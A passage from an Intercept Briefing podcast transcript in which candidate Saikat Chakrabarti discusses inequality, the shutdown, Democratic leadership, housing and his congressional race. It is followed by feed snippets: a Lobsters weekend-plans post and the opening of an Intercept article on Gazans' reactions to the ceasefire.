That’s what happened to me. And like I worked hard, but I did not work harder than a teacher or a nurse or the people cleaning our offices did every single day. I just won the startup lottery — and that to me is wild to have an economy set like that where you can just win a lottery and never have to work again.

While most people actually running society, working hard to run society, we’re saying, “You’re never going to be able to afford a house. You’re never going to be able to have a secure retirement.” I think a society and economy set up like that is doomed to fail. I think that is the ultimate demise of America.

And I’d say to people who are in my position, who have wealth, who don’t see it that way, who aren’t willing to just accept some taxes on themselves to make an economy that actually works for everybody — you’re being shortsighted because this won’t end up good for you either, if you end up in a society that’s a complete dystopia, that’s completely unequal.

“You’re being shortsighted because this won’t end up good for you either, if you end up in a society that’s a complete dystopia.”

AL: Speaking of the people on whose backs the society runs, as we’re speaking, the longest government shutdown ever is on the verge of ending after eight Democratic senators decided to join forces with Republicans to pass a spending package.

For years, you’ve been critical of Democrats, saying they’re too weak, too compromising, too establishment. Do you think they should have ended the shutdown without a healthcare guarantee?

SC: No. I mean, this has been my main critique of the party for so long. A lot of my critique is on the policies and what they actually want to do and what they want to stand for.

“ Strategically, they preemptively cave.”

But a big part of my critique is, strategically, they preemptively cave, and this was a prime example of that. I mean, not through any leadership by Schumer or Hakeem Jeffries, but we were actually winning on this fight. And it’s not like, I don’t think this is a political fight. We were actually fighting for once to deliver something real for people who are suffering in this economy right now.

This economy sucks, and we’re talking about doubling or tripling people’s health insurance premiums in the middle of this, right? So Democrats were winning that messaging. You saw it in the polling, you saw public sentiment on the shutdown going towards Democrats. And then we’re coming off the back of a massive electoral victory last Tuesday where Donald Trump actually went on TV and said, you know, he was saying part of that was because Republicans were losing the messaging on the shutdown fight. So, I mean, call me naive but honestly, I thought like, “OK, finally we have the leverage, we have the upper hand. Maybe Democrats will realize they can push.”

So watching them cave, I mean, oh my God, why? Like, why? You’re winning. You could have actually delivered something and then you could have gone into the next election and said, “We fought Trump and we won.” Because right now, I think the main reason people don’t want to vote for Democrats — part of it’s the policy, but part of it’s, they’re weak! Do you want to vote for people who aren’t going to get shit done for you? No. So this just proved, I think, that image to a bunch of people.

“I’m not seeing Democrats go out there and persuade the public in the way that I saw Dick Cheney and George Bush persuade the public to go to war in Iraq, which was an actually an unpopular thing to do.”

So no, they absolutely should have kept fighting. I think they could have won. And honestly, my opinion, if we had seen Hakeem Jeffries and Schumer and some of the Democratic leaders actually fighting way more — because my big critique of this whole fight was, I’m not seeing it be front-page news every single day. I’m not seeing Democrats go out there and persuade the public in the way that I saw Dick Cheney and George Bush persuade the public to go to war in Iraq, which was an actually an unpopular thing to do. If we use that sort of tactic, I think we could have ended the shutdown way earlier because Trump’s numbers on this would’ve been plummeting way faster, and we would’ve actually gotten something done for people. That’s the part that pisses me off.

AL: You’re touching a little bit on sort of this tension between the inside-outside strategy versus pushing for everything that you possibly can for responding to constituents. On this topic, Alexandria Ocasio-Cortez has faced criticism for what some say has been a moderation in her approach: speaking on the DNC stage, saying Kamala Harris worked “tirelessly for a ceasefire” in Gaza. What’s your response to that and how do you see yourself navigating that inside-outside game if you’re elected?

SC: Look, I think, AOC, she’s kind of alone in there, right? Like there’s only a few, a handful of progressives in Congress right now. And I think they’re all trying to do the best they can with a limited amount of power. And that means trying to push the agenda, trying to push from the inside and working with outside organizations to create pressure.

My goal, honestly, is to replace a huge part of the Democrat establishment. I’ve been very clear about that from the start. I’m calling for primaries all across the country. I’m trying to recruit people to run across the country, and I’m talking to folks who are stepping up and challenging the establishment right now across the country. I think we actually have to get in there and be in a position of power where we can do all that so it’s not going to be this constant compromising with the establishment, trying to figure out how we can push.

I tried the pushing strategy — that’s what Justice Democrats was: We were trying to elect people to try to push the Democratic Party to do the right thing. It’s not going to work. We have to replace them. We just have to replace them. And that’s, you know, to me that’s where I’m headed. That’s my politics.

“It’s because the American Dream has been shattered. Children today are not going to do as well as their parents.”

I think it’s not just existential for the party; I think it’s existential for the country. Because ultimately, I think people have been voting for anybody who’s standing for bold, sweeping economic change ever since the Great Recession. I’d say that was why Barack Obama got elected. I think that’s why Donald Trump got elected. And it’s for good reason. It’s because the American Dream has been shattered. Children today are not going to do as well as their parents. People’s wages have been stagnant for decades while the cost of essentials are going up.

And so what we see is people are really open to the kind of change, but all they know is that the status quo is not cutting it. So Trump has a version of what that change is: MAGA. It’s saying, “You can’t afford a house, you can’t afford a secure retirement because of immigrants, because of our attention to people in foreign countries, because of trans people or scientists,” what have you.

And we have to present an actual vision and a plan on the other side, and then deliver on that plan to improve people’s lives. And that’s not going to happen by pushing people to get on the right policies. It’s going to be a whole movement that has to take power and make it happen — put the country on a path to implementing something like that.

AL: In this vein, you have talked openly as you are now about the fact that the first Squad members who came into Congress have only been able to do so much because of a lack of broader organization among progressives. One of the key proposals you’ve been working on for the last few years is what some people are calling the “ Green New Deal on steroids ” — a successor to the Green New Deal that you led work on as AOC’s chief of staff. What are your plans, and how do you think you can bring them to fruition where other progressive policy priorities have so far failed?

SC: So the thing I’ve been working on at my think tank New Consensus, we’re calling it the “Mission for America.” And it really harkens back to basically what FDR did during the New Deal, but also during the mobilization for World War II to build a whole new economy because I think that’s ultimately the way we defeat authoritarianism. Because back in the 1930s, we had a really powerful, far right in this country. We were actually seeing Nazi rallies in Madison Square Garden, it was filling the stadium.

And the way we defeated that was FDR came in with the New Deal movement. He built this whole new economy and a whole new society that improved people’s lives so dramatically, it just killed this idea that you need an authoritarian to do it for you.

“It just killed this idea that you need an authoritarian to do it for you.”

He proved democracy can work. And he did that through the social safety net. But he also did that by building an industrial base that created the modern-day middle class. So that’s really what the “Mission for America” is. It’s basically taking a lot of the institutions and the lessons from that era and saying, how do we do that today? Because I argue that it’s not just about some policies; it’s actually this whole other kind of governing that we had back then. This is going to get a little bit in the weeds — but we’re on a podcast, so I’m going to go there, all right?

AL: Go for it.

SC: So when you look at the way we used to govern in that era, it wasn’t just like FDR came in with his, like, three policies that are going to pass. No. It was a whole new framework for how to envision society. And he put the government into this mode that we’ve been calling “mission mode.” And in mission mode, it’s really different from how we govern today in three really distinct ways.

One is, you have a leader who actively puts the country on a mission and then follows up: makes civil society join in on the mission, persuades, uses action as a way to create political capital. So FDR did this through his fireside chats, but he also was very active in actually going out and recruiting CEOs to be a part of it. And if CEOs were standing in the way, he would call them out and kind of vilify them publicly as well, if they’re actually just preferring short-term profit over long-term prosperity.

And the second piece is, in mission mode, you make comprehensive plans. So you say, “This is where we’re getting to,” and then you deliver those plans. You don’t just pass some policies and then take your hands off the steering wheel; that’s how we govern today.

And the third piece is, you create institutions to finance and coordinate and execute those plans. We used to have a whole bunch of institutions like this all across our society.

We had public banks in every state. The largest by far was an institution called the Reconstruction Finance Corporation — that was kinda the engine of growth during the New Deal in the World War II mobilization. But after the war, we started dismantling all these planning and financing institutions for a whole bunch of reasons, I can get into that, but I think we’ve just forgotten that whole playbook.

And so the “Mission for America” is this playbook that is a tried-and-true playbook — because it wasn’t just America. After the war, Europe used this playbook to get rich. All the Asian countries used a similar playbook to develop in the ’70s and ’80s and ’90s. They actually called it the American system.

“After the war, Europe used this playbook to get rich. All the Asian countries used a similar playbook to develop in the ’70s and ’80s and ’90s. They actually called it the American system.”

And so we got to do that again to actually show this other route to developing our economy, so that the authoritarians don’t win. So your answer to “How do you get it done?” It has to be, like, I’m imagining we’re going 2028, somebody running for president. We got hundreds of people who are running for Congress who are lined up on this overall vision the same way FDR came in with a whole new New Deal movement. He wasn’t advocating for going back to a pre-Great Depression era. He was advocating for something new. So that’s the way we get it done, and I see some movement towards that.

I will say, I think some of the pieces of this have already become sort of common sense. Things like industrial policy, the Green New Deal managed to get that into the lexicon. The idea that we actually need to focus on the cost of living crisis, but not just say affordability — because plenty of Democrats say affordability — but it has to be backed up with real policy. I think that’s why you had Zohran win in New York. But it’s also why you had Mikie Sherrill win in New Jersey because she was calling for rate hike freezes against utilities and calling out the corporations that were getting in the way. So you need some substance. It’s not just messaging. You need substance.

But yeah, the answer at the end of the day is, we have to have a movement that’s really dedicated to doing this all the way, who aren’t bought out by the corporations. That’s another piece of it, right? You’re not sold out, and you’re not just in there to build a political career for you, which is what most people in Congress are.

AL: I want to ask you a little bit about how you view the timing on this, because we’re talking about 2028. Right now, most Americans are thinking about, “How do I get through a day with the terror and chaos that is the second iteration of the Trump administration?”

You’ve also said that Justice Democrats in some ways was before its time, but that you feel like now there is momentum here. Why do you think right now is the time for this — particularly if you’re talking about two to three years in the future, where we have no idea what the political landscape is going to look like?

And right now, obviously this is timely for your race, the disappointment with the Democratic Party is at an all-time high, but we don’t know where it’s going to be in 2028.

SC: So I want to be clear, like the reason I’m talking about 2028 is, in 2026, we’re still going to have Trump as president, and I think the real work for 2026 is to start building this movement. And to actually get victories and get new people in there, and use that as a jumping-off point to doing the larger stuff and defining what 2028 is going to be. That’s going to be part of it. And actually stopping this coup — like that’s something I haven’t even touched on yet. But we actually need people in there who know how to stop what’s happening, who know how to stop the authoritarianism. Because if we don’t have fair and free elections in 2028, it’s game over anyway, right? So we actually have to stop that.

But why do I think it’s possible now? I’m seeing it in the campaign. Like in 2018, it was a similar moment. Trump had just won in 2016. A lot of Democrats were really frustrated with the party. Democrats were looking for what comes next. But a lot of people also thought it was maybe a fluke. And I’d say when we were working on all those Justice Democrats races in 2018, it was largely like progressive activists coming out, progressive activists who were getting involved. But a lot more new progressive activists who were coming into the fold.

Right now, what I’m seeing in the race is — you know, I do these calls with voters in San Francisco every day; anyone can go to my website and sign up for a video call with me. The kinds of people showing up to those calls, it’s not just progressive activists. It’s like lifelong Pelosi voters; some mainstream Democrats; people who thought 2016 was a fluke but then Trump just won again and they’re like, clearly something is wrong. And they’re looking for those answers.

“In 2018, it was a similar moment. Trump had just won in 2016.”

And we just did a rally a couple of weeks ago in the Mission, and we had 800 people show up. It was so many people we couldn’t fit them in. And this is like almost a year out from the election. That kind of energy I did not see in 2018. So I think this is just a very different moment. The polling bears it out too. If you look at the Democratic Party’s polling amongst its own base against Trump, I mean, we’re polling worse than Trump, right?

So the party’s in an existential crisis. It has to be new people leading the party, and I’d say the mainstream of the party realizes that. So that’s, I think, the opportunity — because we’re in such a crisis. But yeah, I agree with you. In the short term, the problem is, how do you keep this coup from actually happening? And what can we actually do in the short term to actually fight where we have leverage, like on this frickin’ Senate budget bill?

AL: On this, I want to push on this authoritarian thing — because what would you be doing, or what would you want to see Democrats in Congress doing that they’re not doing right now to stop Trump from doing what he’s doing, particularly in the minority?

SC: Yeah, I think it boils down to three big things. One, I do think Democrats in positions of power could actually be showing up when, say, ICE is in our cities, kidnapping people off the streets. You have some privilege in your power. We saw [Mayor] Karen Bass do this to an extent in LA when ICE was rolling through MacArthur Park. She showed up and she said, “I’m not leaving until you do.” She put the ball in their court to escalate. So do it nonviolently, but you put it on them to escalate, and they really weren’t willing to go there.

I think the second piece is, Democrats need to realize that their position as opposition leaders right now is not just about writing policy and legislation. We actually need to organize civil society. I think the way, the bulwark against fascism is civil society. So what I mean by that is, when Trump’s going after law firms or media companies or universities , he’s going after them one at a time, and they fall like dominoes, it’s easy. But if they could actually organize as collective blocks, they could be a real opposition.

I’ve talked to some people who work at law firms who’ve been trying to do that. It’s very difficult for them to organize each other as peers. But if you have political backing behind you, if you have a legislator who’s actually trying to organize you, I think that’s something you do. Or similarly, like you see AOC or Bernie going around, doing the anti-oligarchy tour, drawing big crowds. Turn that into a real citizen force to be an actual bulwark against fascism.

“The way authoritarianism works, it’s this constant process of them trying to make the abnormal normal.”

But the third piece I’d say is a bit on messaging. It’s like when Trump oversteps his bounds, call it out and stick with it. And we saw this happen with Kilmar Ábrego García where Trump deported him to CECOT and then [Sen.] Chris Van Hollen, D-Md., went down there and wouldn’t leave and just stuck with it. And then Trump started seeing his numbers go down, and he got sent back.

And it’s just this thing where, like the way authoritarianism works, it’s this constant process of them trying to make the abnormal normal. They’re pushing this tide and we have to be the force that’s constantly pushing that tide back, calling it out, keeping things abnormal abnormal. Because if we let them just do it — before we know it, it’s normal for them to own all the county election boards. It’s normal for them to own all the election machines. And it’s normal for them to stuff the ballot boxes, and then it’s game over. Right. So it’s daily work. It’s daily work. You just have to be fighting every single frickin’ day.

[Break]

AL: Switching gears to affordability, which you touched on a little earlier. This issue, cost of living, is top of mind for many, many voters, and you’ve said , “building millions of units of affordable housing and social housing” is a priority for you. How would you try to achieve that? Especially running in one of the country’s most expensive cities to live in? And I sympathize with you talking from New York.

SC: Yes, you’re probably the second most expensive. But I really think of housing, the way we need to be thinking about housing is as infrastructure. You know, the way we think about building out our road systems or the way we think about building out our power grids. So what we actually need is real plans for the housing we have to build and then have every tool available to us to make it happen.

So part of that means the government directly funding and building social housing. Right now, it’s actually illegal for the government to build new public housing because of something called the Faircloth Amendment. So we should repeal that. But the other piece of this is like, we don’t have the institutions, like we don’t have a public bank that can directly finance social housing. And that’s something that I call for recreating.

Things like right now material costs are really high. Well, if we had something like a modern day version of the Reconstruction Finance Corporation like I was talking about that FDR had, which is something I call for doing, we could do things like stockpile materials when costs are low so that we can try to keep inflation costs from hitting housing construction costs.

So it’s just this whole of society approach to try to just tackle this problem and actually build housing. Because building housing is not an impossible task. We’ve been doing it for hundreds of years, right? It’s just this matter of, we currently have this approach of just let’s do some deregulation there. Let’s, you know, do some policy reforms there and then see if the private markets will handle it.

And I’m not someone who’s against making it easier and cheaper to construct housing. I absolutely think that’s also a problem in my city. And I think that’s also a problem in New York. And the way Zorhan talked about this was: We gotta cut red tape, build affordable housing and freeze the rent. Right? That’s basically my approach is we actually need to make it easier to construct housing, build the housing, and then the other piece of it is, actually get a control on costs. Get a control on speculation. That’s another piece I didn’t touch on, but get a control on hedge funds and private equity coming in, buying up housing, propping up the market, and making it unaffordable.

AL: How do you define social housing? I just want to clarify here.

SC: Yeah. Lots of ways to potentially define it. Yeah, that’s a good question.

So one route here is I think the government should have a public developer that can straight up go out and build the housing, right? That’s just something that we currently don’t have in our tool chest. The state owned corporations, for some reason, that’s supposed to be a taboo thing. It makes no sense.

We used to have it before. Plenty of countries do it this way, but also I think there is options for the government to say take equity stakes in housing developments as a way to control pricing there. Right? And that’s a model we saw in Montgomery County that’s worked really well for them.

But it boils down to like all of the above approach to making sure the housing gets built and that it’s actually affordable and people of all income levels can live in it.

AL: You’ve touched on sort of changing the mindset and the way that we think about this, and instead of doing piecemeal deregulation, thinking about this as an institutional, a larger institutional shift. But why do you think you’ll be successful given that this is something that people have been trying to solve for years, particularly in San Francisco — the housing crisis?

SC: Again, I think it boils down to can we have a mindset shift in the entire Democratic Party on how we approach not just housing, but all of our problems because this is sort of the theme of the larger idea I’m trying to push here. Is this how you solve problems in society in general? Like if we want to build a new clean energy economy, it’s not going to work to just do some tax incentives and do some deregulation here and there. You actually have to have a plan, a goal, milestones, and then use tools like financing and public developers and everything else you need to hit that goal. Execution matters just as much, if not more than passing the policies. And this is just, you know, I do have some experience getting these new ideas across the finish line through things like the Green New Deal.

That’s the approach I’m going to take with something like this, is I just got to get the ideas to happen and I want to recruit a movement of people who believe in this approach. I think it’s the approach that works, is the approach that’s worked historically. But yeah, I mean, I think the answer is we need new leaders who are willing to actually care about solutions and not just fundraising.

AL: Relatedly, you, you talked a little bit about this in terms of your political development. San Francisco has been a bit of a dog whistle for the Trump administration on issues of crime and homelessness and addiction. I think back to the recall of District Attorney Chesa Boudin. I mean, where do you fall here and how would you respond to that kind of targeting if you represented this district in Congress? Because it sounds like you’re saying there are some elements of truth to this, and there are some elements that are Trump machinations, but where do you fall here?

SC: Yeah. I mean, I honestly get really pissed off when I do see kind of essentially caricatures of this city, because if you come here, I mean, it’s an amazing city. It’s the greatest city on earth. It’s beautiful. Most of the city is doing great, but of course we have some problems.

But I am a big believer that if you look at the problems that we have, you really see versions of it everywhere. We have them particularly hard here because things like inequality, the cost of living are worse in San Francisco, and I think that’s the root cause of a lot of the issues that we see, whether it’s the homelessness we see on the streets, or even the drug addiction, mental health crises we see on the streets. But it’s really going all over the country. I think we have to actually solve these larger structural issues at a national level.

And this is something I’m trying to really get across in my campaign is these are not problems San Francisco created on its own, it’s not problems San Francisco’s going to be able to solve on its own. Just to take one example. You know, if you look at our city budget, the largest driver of costs of our city employees is healthcare benefits. And the only answer a city can have to that is cutting more and more services, right? Like that’s basically the approach we have because the city has to balance its budget. So we have to solve healthcare at a national level if we want to save our cities.

And that’s why what I’m talking about these structural things that we have to do at a national level that I think both parties have just ignored for decades has just come to a breaking point. So, yeah, I think that’s the way we tackle San Francisco’s biggest problems.

AL: One of the moderate groups that helped shape the 2022 recalls of Chesa Boudin and several San Francisco school board members, Grow SF has said you might have a shot at winning, particularly if you focus on issues that matter to moderate voters in San Francisco. What do you make of that?

SC: You know, I don’t think it’s about progressive versus moderate. And this is kind of my take on the country as a whole. I really think you’re just going to keep getting backlash politics to dysfunction and failure of governance. And I think that’s really what we saw in San Francisco.

I think when you look at the recall elections that happened, it was a reaction to just general dysfunction at the city government. It was a reaction to COVID, honestly, resulting in a lot of disorder on our streets. And my view on it is, yeah, we elected in a new “moderate government,” but if they fail to actually govern well, there’s going to be a backlash to that as well.

And nationally, I’m seeing this in the same way that you see people voting for Obama and then Trump, and then Biden, and then Trump again. Is just that nothing is working. People are looking for change. They’re looking for real structural solutions to these big problems. So I agree with GrowSF that I do have a shot, I’m going to win this race.

But I don’t think it’s just about appealing to moderate voters. If you ask most voters, of course, most voters will say they’re moderate, but you ask them like, “What do you think needs to happen?” Views are actually all over the place, but the thing that they’re right about is you do have to talk about the real issues that are affecting people’s lives and how are you actually going to solve them.

So I would argue everything I’m talking about solving those issues, they’re all overwhelmingly popular. So I guess definitionally, they’re moderate or centrist, who knows? But they’re also, you know, they make sense. They’re just practical.

AL: I want to talk about the Democratic Socialists of America. On the national stage, they’re having a huge moment after Zohran Mamdani’s success in New York. He’s one of the hottest politicians in the country right now. And some of your supporters and other people have compared you to. Even though it’s a national brand, DSA is made up of local chapters and the San Francisco DSA has bristled at that comparison between yourself and Mamdani, pointing out that you supported a local centrist Democrat who ousted the only Democratic socialist on the San Francisco Board of Supervisors. Are you trying to court DSA’s support, and if so, how do you plan to get them on your side? And if not, why not?

SC: Yeah. I mean, basically, the way I run my campaigns every time is I run on what I’m running on and if people want to support that, great. I’ll always talk to everybody, right? Like I’ll of course talk to DSA San Francisco. I’ll talk to other folks as well. But to kind of talk about, you know, the specific thing DSA San Francisco is upset about, like, I would not say the person I supported was a centrist.

I backed him because I’ve known him for a while. We worked together on legislation in the state. We wrote an op-ed together about a Green New Deal for California. And, you know, since being elected, I haven’t agreed with everything he’s done. But I really think he is a good guy who’s a progressive, who was trying to chart this path that was about how do we actually do progressive things. He was good on criminal justice reform while also making sure we’re building housing in the city, especially affordable housing as well. And I think he’s a real problem solver, you know. And it’s interesting, in the past, he actually got a lot of crap from the “abundant YIMBY” people because he was supporting the progressive in one of their races, right? So he was trying to chart this new path and I think that’s admirable.

That’s like something I would like to do as well. We can’t— I think we have this weird polarization, especially in San Francisco between these two factions and there is a version of the YIMBY faction that’s just like, you know, neoliberalism, like “let’s just deregulate; let the private markets rip.” I don’t agree with that, but I think there’s a lot of folks who actually want to use every tool to make sure we’re building all the housing we need. And similarly, in DSA, I have a lot of folks from DSA who are volunteering on the campaign and it seems like there’s a split there too, where there’s some folks who are a bit more like, you know, YIMBY-DSA people, right?

And I’d argue Zohran is kind of in that camp. So, yeah, I mean, I’m not going to shy away from saying I like what Zohran did because I like what he did. You know, I’m not trying to say I’m Zohran at all. But it’s very exciting to me to see him win. But at the end of the day, I am trying to run perhaps a new lane of politics.

Like we actually have to do the things like expand the social safety net. We actually have to do things like Medicare for All, and we have to build industry, we have to build housing, we have to do all of these building projects to make life better for people.

Now one thing that sometimes gets conflated with is, you know, the influence of tech money and oligarchy in both national politics and locally. And I want to be clear, that is a bad thing that has a corrupting influence. And in that election that I supported Bilal [Mahmood] , he was very clear that he doesn’t want Elon Musk. I mean, it sucks that like the tech fascists were trying to get involved in that election, but Bilal told Elon to go fuck himself.

And so I want to be clear that they are my enemy, right? Like the the fascists who have lined up with Donald Trump — Peter Thiel, Elon Musk, David Sacks — they are doing a craven coward project of cowardice where they’re just doing political opportunism to enrich themselves, and they absolutely have to be called out on that and cut out from power in the long run.

But I do hope we can get to a place where we are actually solving these problems.

AL: I have to ask, because you mentioned it. What is your abundance take?

SC: It’s, yeah, I mean, I did a long podcast with Ezra Klein on it. But I mean, look, when we did the Green New Deal that was abundance, like we were talking about, we got to actually do energy abundance. We have to actually do this to create high wage industries so people have tens of millions of jobs. But my argument, my critique of the abundance folks, is that a lot of the times I see them falling to a camp of, “Oh, if we just did the exact right permitting reform or zoning reform or deregulation, we would get abundance.” And I think that’s completely unrealistic.

If you look at the history of every country that’s ever developed their economies — and I’m talking about all of post-war Europe, all the Asian countries, America during the World War II mobilization — it has never happened by just having the right permitting, you know, guidelines. You actually have to do this mission driven approach, which has been what I’ve been pushing for the last decade in my politics. It really is how do you actually do it, which is huge amounts of state capacity, public financing, comprehensive plans. You set the country on a mission and you just go for it.

So that’s my answer is like, yeah, I mean, great, like I would be all for getting rid of the counterproductive regulations that currently get in the way of building things that everybody needs. But that’s not going to be enough. You know, it’s not even going to be close to enough. We have to do way more than that, if we are serious about abundance.

AL: The race to win the San Francisco district is already shaping up to be competitive among Democrats. Most widely recognized of the candidates, State Senator Scott Wiener announced his candidacy last month. In Sacramento, Weiner has fought to increase housing density and protect transgender rights. Board of Supervisor Connie Chan has not officially thrown in her hat but is believed to be considering and could potentially secure the support of the city’s most powerful unions. Former San Francisco Mayor London Breed has also said she’s considering a run. What makes you stand out from the pack? You haven’t held public office before, why do you think you’re the right person for the job now?

SC: Yeah, I mean, first off, I’m the only one here that’s talking about actually doing the political revolution inside the party to get us to a point where we can do the big structural changes.

I don’t know what the theory of change is for any of these other folks who are running, because what are you going to do? You know, someone like Senator Wiener or any of the folks running, like if you’re just going to go in and be another Democrat in the current system and not talk about changing the system, what are you going to actually accomplish? How are you going to accomplish anything? I don’t know. You know, maybe they have some answer to that, but I haven’t heard it.

So, and I’d say like the other piece of this where I do have a difference from someone like Senator Wiener. I mean, Senator Wiener has been in government in San Francisco in some form for the last 14 years. And his main focus has been housing. And in that time, I mean, rents in San Francisco have more than doubled. We have a housing crisis. I wouldn’t say he’s been successful in the outcomes on what his focus has been. But also it’s really different to be a state senator in a largely Democratic Sacramento where you’re passing some legislation reforms here and there.

I’d say in Congress, we have to figure out how to get past the gridlock. And that is what I have experience doing. I mean, when I was in charge of writing and launching a Green New Deal as AOC’s chief of staff, and that wasn’t just a policy that we’re trying to pass. It was a political strategy because at that time, the entire Democratic caucus was just trying to talk about carbon taxes and cap and trade. And we came in and said, A, actually, this is not going to do anything for climate change. But B, it’s politically stupid. You’re talking about punishing people as a way to solve climate change. What we actually need to do is talk about building the clean high wage, high tech industries that’ll create tens of millions of jobs. The crisis of climate change is in fact the greatest opportunity in our generation to reverse decades of economic devastation. And we were saying the plans out there were just way too small.

And so the way we introduced the Green New Deal was AOC did a sit-in, in Speaker Pelosi’s office on her first day in D.C., which was this huge act of political courage. She joined [the] Sunrise Movement and then we did inside-outside organizing with Sunrise. Sunrise was doing sit-ins while I was calling up the staffers on the inside to get them onto Green New Deal. And then we did that with the presidential candidates. And Sunrise would go into town halls while I was calling up the, you know, the staffers on the campaigns for president.

And the result of that was every single person running for president had to respond. And they did. They responded with their own ambitious plans for climate. Even Joe Biden who responded with the Build Back Better. And that turned into [the] Inflation Reduction Act, which wasn’t everything I wanted, but it was the largest investment in climate change and clean manufacturing in the history of this country.

So that’s the kind of experience I bring. So if you’re someone who thinks we need to tackle these structural problems and have someone who’s going to creatively work to actually push through new ideas, that’s what I’m running for.

AL: Closing out, I’m going to ask you about Nancy Pelosi, the person you’re running to replace. How do you view her legacy?

SC: I’ve been pretty respectful of her. You know, I do think she has had a long career and she’s done a lot of good stuff in that time. I think especially when she first came in, she was kind of this fearless voice calling out attention to the AIDS epidemic that was ravaging San Francisco at the time, and it wasn’t necessarily popular countrywide. But it worked like she managed to get help and money into the district and provide real relief for people.

You know, I think, I would say like I’m also honestly struck by the level of leadership it took for her to step down because that is something that we don’t see a lot of people in D.C. do. I think it’s going to result in people remembering her for what she did, rather than her just being in there too long like people like RBG and Diane Feinstein.

And the reason I ran this race in the first place was, I was really saying, you know, speaker Pelosi, former Speaker Pelosi, she’s had this long career, she had some skills but we are in this era where we need new ideas, we need new leaders, we need people who are going to push the party in a new direction. I just don’t think that’s what her role is and that’s what she was necessarily in the position to be able to do. So, yeah, I’ve got a lot of respect for her, but I’m glad she was able to make the decision to pass the torch.

AL: Do you want her endorsement?

SC: That’s for her to make. I mean, look, I’m going to run the race, I run. And this is how I always run any race, it’s on me to prove myself and prove that this campaign is worth it. And so anybody who wants to be a part of that campaign, anybody who wants to endorse, who thinks they see themselves in this, welcome to have your endorsement.

AL: I understand what you’re saying, but can you explain if she decided to endorse you, why you would welcome it if you were previously running against her?

SC: I mean, I don’t, I just don’t think it’s going to be a problem, because I’m pretty sure she’s not going to offer an endorsement given that I just primaried her. I mean, come on.

AL: The thought exercise. Let’s do the, let’s do the thought exercise. I’m just try, I’m trying to get at this tension between having criticism for someone and still having respect for them and how you see sort of—

SC: Because it’s a criticism, it’s a criticism of a system, right? It’s a criticism of the Democratic Party. So if somebody realizes that, “Oh, actually Saikat was right,” I mean, this is really getting outlandish. But say, Nancy Pelosi suddenly says, “OK. You know what, Saikat, you were right to challenge me. You were right that we need real change in the party. You were right that we need new ideas. So I’d like to endorse you.” I will always accept people changing their minds and coming over. I’m never going to say no just because I disagreed with you in the past. I’ll never accept anything you say. A key thing here is I’m not going to change who I am or what I’m running on to get anybody’s endorsement.

I’m going to run what I’m running on. I’m going to run the way I’m running, I’m going to run still calling out Hakeem Jeffries and Chuck Schumer and all the leadership that’s failing us right now. And so if you think that’s the race you want to be a part of, great. But if you think you’re going to change me to get an endorsement, sorry, it’s not going to happen.

AL: You’ve been very openly saying Hakeem Jeffries should be primaried. What’s your take on Schumer? Where do you stand on him particularly after this shutdown showdown?

SC: I mean, he should absolutely be primary. I mean, there’s no question. Chuck Schumer has completely failed as leader for Senate. This is— He’s getting too many chances and he’s completely out of step with the party and frankly, I think he’s damaging the party, especially when it came to something like the Zohran race in New York, where Schumer, he never endorsed. As far as I know, he didn’t even say if he voted for him.

AL: Saikat Chakrabarti, thank you for joining me on the Intercept Briefing.

SC: Thank you. Thanks for having me.

AL: That does it for this episode of The Intercept Briefing.

We want to hear from you. What do you want to see more coverage of? Are you taking political action? Are there organizing efforts in your community you want to shout out? Shoot us an email at podcasts@theintercept.com. Or leave us a voice mail at 530-POD-CAST. That’s 530-763-2278.

This episode was produced by Laura Flynn and Andrew Stelzer with editorial support from Maia Hibbett. Sumi Aggarwal is our executive producer. Ben Muessig is our editor-in-chief. Chelsey B. Coombs is our social and video producer. Desiree Adib is our booking producer. Fei Liu is our product and design manager. Nara Shin is our copy-editor. Will Stanton mixed our show. Legal review by David Bralow.

Slip Stream provided our theme music.

If you want to support our work, you can go to theintercept.com/join. Your donation, no matter the amount, makes a real difference. If you haven’t already, please subscribe to The Intercept Briefing wherever you listen to podcasts. And leave us a rating or a review, it helps other listeners to find our reporting.

Until next time, I’m Akela Lacy.

What are you doing this weekend?

Lobsters
lobste.rs
2025-11-14 10:54:20
Feel free to tell what you plan on doing this weekend and even ask for help or feedback. Please keep in mind it’s more than OK to do nothing at all too!...
Original Article

Helping my bonus son and his fiancee to move apartments.

You know how in sitcoms someone is at the end of their DIY rope and have to call some father figure for help? Turns out I am that father figure now, and I have huge impostor syndrome.

Gazans Reflect on Surviving to See a Ceasefire: "Sometimes We Envy the Martyrs"

Intercept
theintercept.com
2025-11-14 10:00:00
Living through genocide means inhabiting a “city of ghosts,” surrounded by rubble and memories of all that's been lost. The post Gazans Reflect on Surviving to See a Ceasefire: “Sometimes We Envy the Martyrs” appeared first on The Intercept....
Original Article
Nooh Al-shaghnobi sits on the rubble of his home in Gaza. Photo: Nooh Al-shaghnobi

For Gaza’s 2 million survivors, the word “ceasefire” no longer sounds like peace; it sounds like a trick of language, another fragile pause between massacres. After two years of genocide that erased entire families, neighborhoods, and futures, many in Gaza met this fragile truce not with celebration but disbelief, exhaustion, and fear. One Palestinian described the current moment as a “pause between two pains”: the horror they lived through and the uncertainty that has followed.

I spoke with six people from Gaza — a filmmaker, a photojournalist, an architect, a former spokesperson for the Gaza Municipality, a civil worker, and a survivor — who offer a piercing look into what it means to first live through a genocide and then to try to live through its aftermath. Their words reveal a haunting truth: The war may have paused, but it doesn’t feel truly over.

“No Triumph in Surviving”

Hala Asfour, a 24-year-old filmmaker and photographer, said her initial reaction to the ceasefire was pure disbelief. “I didn’t feel joy,” she says. “Just this heavy, oppressive feeling, like my heart couldn’t absorb what had happened. I feel a great void. Even a week later, I still see the war everywhere: in people’s faces, in the children, in the echo of planes and drones that will never leave my memory.” For Asfour, this ceasefire is a pause, not peace. She calls it a “pause between two pains,” the agony of the genocide they endured and the suffering that continues in its aftermath.

“I still see the war everywhere: in people’s faces, in the children, in the echo of planes and drones.”

Fear is now part of her body, she says, and escaping it seems impossible. “Fear is something I breathe. It’s inside me. Every loud sound, every plane, every buzz — it takes me back to that first explosion of the war. Safety? I don’t feel it at all,” she says. She thinks this ceasefire is a pause that feels like the calm before the storm. She and the people of Gaza lived through many truces before , only to have new, more devastating attacks follow.

Hala Asfour and her fiancé, Mohammad Salama, who was killed in an Israeli airstrike. Photo: Mohammad Salama

For Hala, the war stole much more than homes. It stole her life, herself, her friends, her colleagues, the familiar streets, and everything that looked like her. Hala also lost her fiancé, the Palestinian journalist Mohammad Salama , an Al Jazeera camera operator, in a “ double-tap ” Israeli strike on Nasser Hospital in Khan Younis, southern Gaza, on August 25, 2025, that also killed five other journalists.

“My wish now is to have one normal day.”

